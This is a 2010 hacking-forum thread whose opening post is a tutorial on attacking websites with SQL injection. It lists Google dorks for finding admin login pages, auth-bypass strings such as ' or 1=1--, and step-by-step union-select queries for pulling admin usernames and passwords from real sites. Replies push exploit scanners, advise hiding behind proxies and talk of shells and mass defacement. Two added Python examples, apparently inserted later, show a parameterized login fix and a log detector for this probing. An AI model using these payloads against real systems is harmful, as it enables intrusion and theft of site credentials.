Post: basic SQL injection website hack!
06-30-2010, 11:37 AM #1
Sempiternal
Previously uG~ Wounded
Before I start, I just want you guys to know that this is NOT a copy-paste job. OK.

===================================================
by Ryan aka. Iriish_Bhoii aka VIPhiggz09

Q: What is SQL injection?

A: Injecting SQL queries into another database, or using queries to get auth bypass as an admin.

Part 1: Basic SQL injection

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need to find a site; start by opening Google.
Now we type our dork (definition of dork: "a search entry for a certain type of site/exploit, etc.").
There are a large number of Google dorks for basic SQL injection.
Here are the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

So what we do here is, in the username we always type "Admin",
and for our password we type our SQL injection.

Here is a list of SQL injections:

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

'Winky Winky or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

'Winky Winky or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'


There are many more, but these are the best ones that I know of.
What this SQL injection is doing: confusing the **** out of the database till it gives you auth bypass.

So your input should look like this

username:Admin
password:'or'1'='1

So click submit and you're in.
NOTE: not all sites are vulnerable.


Part 2: Injecting SQL queries to extract the admin username and password

OK, so let's say we have a site:
You must login or register to view this content.
There is a list of dorks for sites like this:

"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
or the best in my view "full credit to qabandi for discovering this"
"inurl:".php?catid=" site:xxx"


So once you have your site
You must login or register to view this content.
now we add a ' to the end of the url
so the site is
You must login or register to view this content.'
if there is an error of some sort then it is vulnerable
now we need to find the number of columns in the sql database
so we type
You must login or register to view this content. order by 1-- "no error"
You must login or register to view this content. order by 2-- "no error"
You must login or register to view this content. order by 3-- "no error"
You must login or register to view this content. order by 4-- "no error"
You must login or register to view this content. order by 5-- "error"

so this database has 4 columns because we got an error on 5
On some databases there are 2 columns and on some 200; it varies.
so once we have the column number.
we try the union function
You must login or register to view this content. union select 1,2,3,4-- "or whatever number of columns are in the database"
if you see some numbers like 1 2 3 4 on the screen or the column names
it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db
so now we need to get info about the db
so lets say the numbers 2 and 4 showed up on the screen
so i will use my query on 2
You must login or register to view this content. union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
the db type and version will pop up on the screen
if the db version is 4 or lower then to extract the password you will need these queries
You must login or register to view this content. UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
this should display the table containing the admin username and password
but if not then you will have to guess the table
so once you have your table "or not"
then type
You must login or register to view this content. UNION SELECT 1,password,3,4 FROM admintablename--
where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess
Then once you have the right table name you should get the administrator password.
Then just do the same thing but type username instead of password.
Sometimes the password is hashed and you need to crack it.
Then see if you can get the admin panel; if you can't, then try the admin panel finder script here: You must login or register to view this content.
now if the database is version 5 or up
type
You must login or register to view this content. UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
and that will display a list of all the tables
once you have your table name
type the same thing as 4
You must login or register to view this content. UNION SELECT 1,password,3,4 FROM admintable--
then the same with username
but now if it doesn't work for all those things
just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing
just play around with those
but sometimes we also need to use the version() or version@@
so sometimes UNION SELECT version (),password,3,4 FROM admintable--
or UNION SELECT version @@,password,3,4 FROM admintable--

Well, that about wraps up my SQL injection tutorial.
You can contact me on
[email protected]
Only MSN me, NO EMAILS, I HATE THEM

The following 2 users say thank you to Sempiternal for this useful post:

ilovepizzaa, KingMoFoSEXYMan
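
Added example, not part of the original post: why the part 1 strings get past a login form and what stops them. It assumes a hypothetical `admins` table in an in-memory SQLite database with a constructed account; `login_vulnerable` builds the query by string concatenation, while `login_hardened` binds the username as a parameter and checks a salted hash in application code.

```python
import hashlib
import hmac
import sqlite3

# Strings quoted from part 1 of the post above.
PAGE_STRINGS = ["' or '1'='1", "' or 'x'='x", "' or 1=1--"]

def hash_pw(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """In-memory database holding one constructed admin account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins "
               "(username TEXT, password TEXT, salt BLOB, pw_hash BLOB)")
    salt = b"constructed-salt"
    pw = "S3cret-constructed"
    db.execute("INSERT INTO admins VALUES (?, ?, ?, ?)",
               ("Admin", pw, salt, hash_pw(pw, salt)))
    return db

def login_vulnerable(db, username, password):
    # Legacy pattern: input is pasted into the SQL text, so a quote in the
    # password closes the string literal and the rest is parsed as SQL.
    sql = ("SELECT 1 FROM admins WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # input broke the statement's syntax

def login_hardened(db, username, password):
    # Bound parameter: input is always data, never SQL. The password never
    # enters the query; it is compared against a salted hash in code.
    row = db.execute("SELECT salt, pw_hash FROM admins WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(hash_pw(password, row[0]), row[1])

def compare(passwords):
    """Map each submitted password to (vulnerable_result, hardened_result)."""
    db = make_db()
    return {p: (login_vulnerable(db, "Admin", p), login_hardened(db, "Admin", p))
            for p in passwords}

if __name__ == "__main__":
    for p, (weak, strong) in compare(PAGE_STRINGS + ["S3cret-constructed"]).items():
        print(f"{p!r:24} vulnerable={weak} hardened={strong}")
```
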
07-01-2010, 07:38 AM #2
KingMoFoSEXYMan
Watching 1v1s
You confused me with the two sets of dorks you found two diff sites mind helping me out there?

Edit: Ohh, never mind, I think there's two diff tuts in one, right?
07-01-2010, 08:06 AM #3
Sempiternal
Previously uG~ Wounded
Originally posted by KingMoFoSEXYMan
You confused me with the two sets of dorks you found two diff sites mind helping me out there?

Edit: Ohh, never mind, I think there's two diff tuts in one, right?


Hey there. Dork lists are getting quite old in the world of hacking. "Exploit scanner" scans hundreds of websites in seconds to check their vulnerability. EVEN SQL injection is becoming easier and easier with new programs hackers are releasing which do the entire hack for you. But yeah, I don't recommend dorks anymore. Exploit scanner is the way to go nowadays.
07-01-2010, 08:17 AM #4
KingMoFoSEXYMan
Watching 1v1s
Mind to hook me up with one that has no viruses?
07-01-2010, 08:39 AM #5
Sempiternal
Previously uG~ Wounded
Originally posted by KingMoFoSEXYMan
Mind to hook me up with one that has no viruses?


OK.. here is just a list of the general tools you need to make SQL injection a much easier process.

Databases & SQL Injection & XSS TooLz Directory:
Casi 4.0
ForceSQL
Mssql BruteForce TooL
SQL Ping 2
SQL Recon
SQL Vuln Scanner
SQL & XSS TooL

Here is the download. Don't worry, it is virus free.

You must login or register to view this content.

There are also other tools in that download too, but only concentrate on the SQL injection part. Also MAKE SURE you are running a proxy. Proxies are used to hide hacker identities from the real admins of websites. Last time I used it, it changed my IP to somewhere in Palestine, so that's where the admin will think the culprit is from. So be sure to use that as well. :)
07-01-2010, 08:58 AM #6
KingMoFoSEXYMan
Watching 1v1s
I used to be in this stuff big time a long time ago but got out of it after one of the major forums I used got closed down. Looking to get back into it :P Love shells if you can find vul sites. Maybe we can have a mass defacement in the future.
07-01-2010, 11:54 AM #7
Sempiternal
Previously uG~ Wounded
Originally posted by KingMoFoSEXYMan
I used to be in this stuff big time a long time ago but got out of it after one of the major forums I used got closed down. Looking to get back into it :P Love shells if you can find vul sites. Maybe we can have a mass defacement in the future.


I started hacking because knowing I can have authority over something I'm not supposed to attracted me, because I'm underprivileged in life. I'll not bore you with my life problems. But yeah, that's how I got into hacking.
07-13-2010, 09:36 AM #8
192.168.1.1
Slave of the sky.
Half way through this I zoned out and started thinking of dog food. :/
07-24-2010, 07:23 AM #9
Vishwa
Guest


There are no files there....can you reupload please?

Thanks
07-24-2010, 10:31 AM #10
Dylan_Owns
Master of teh internetz
I'm sure SQL Injection isn't legal, is it??

Also, who needs this when I can just AIM MY LOW ORBIT ION CANNONS AT IT!!! WHEN AIRSTRIKES, SOLDIERS AND TANKS FAIL, BLOW IT TO PIECES USING YOUR ION CANNONS!!!
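
Added example, not part of the thread: the URL probing walked through in part 2 of the first post (a trailing quote, `order by N--`, `union select`, `information_schema`) leaves a recognisable trail in web server access logs. The sketch below scans constructed log lines in an assumed Apache-style format; the rule names and the two-rule threshold are illustrative choices, not a standard.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jul/2010:08:00:01 +0000] "GET /news.php?catid=3 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jul/2010:08:00:05 +0000] "GET /news.php?catid=3%27 HTTP/1.1" 500 310
203.0.113.7 - - [01/Jul/2010:08:00:09 +0000] "GET /news.php?catid=3+order+by+1-- HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jul/2010:08:00:15 +0000] "GET /news.php?catid=3+ORDER+BY+5-- HTTP/1.1" 500 310
203.0.113.7 - - [01/Jul/2010:08:00:20 +0000] "GET /news.php?catid=3+union+select+1,2,3,4-- HTTP/1.1" 200 5300
198.51.100.20 - - [01/Jul/2010:08:01:00 +0000] "GET /news.php?catid=12 HTTP/1.1" 200 4800
198.51.100.20 - - [01/Jul/2010:08:01:30 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 900
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) ')

# One rule per step of the probing sequence described in the post.
RULES = {
    "quote_in_numeric_param": re.compile(r"=\d+\s*'"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*(--|#|/\*)", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
}

def scan(log_text):
    """Return {client_ip: sorted rule names} for requests matching any rule."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, target, _status = m.groups()
        # Decode %27 and '+' so the rules see what the application saw.
        query = unquote_plus(urlsplit(target).query)
        for name, rx in RULES.items():
            if rx.search(query):
                hits[ip].add(name)
    return {ip: sorted(names) for ip, names in hits.items()}

def suspects(log_text, min_rules=2):
    """Clients that tripped several distinct rules; one hit alone is noisy."""
    return sorted(ip for ip, names in scan(log_text).items()
                  if len(names) >= min_rules)

if __name__ == "__main__":
    print(scan(SAMPLE_LOG), suspects(SAMPLE_LOG))
```
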

Copyright © 2026, NextGenUpdate.
All Rights Reserved.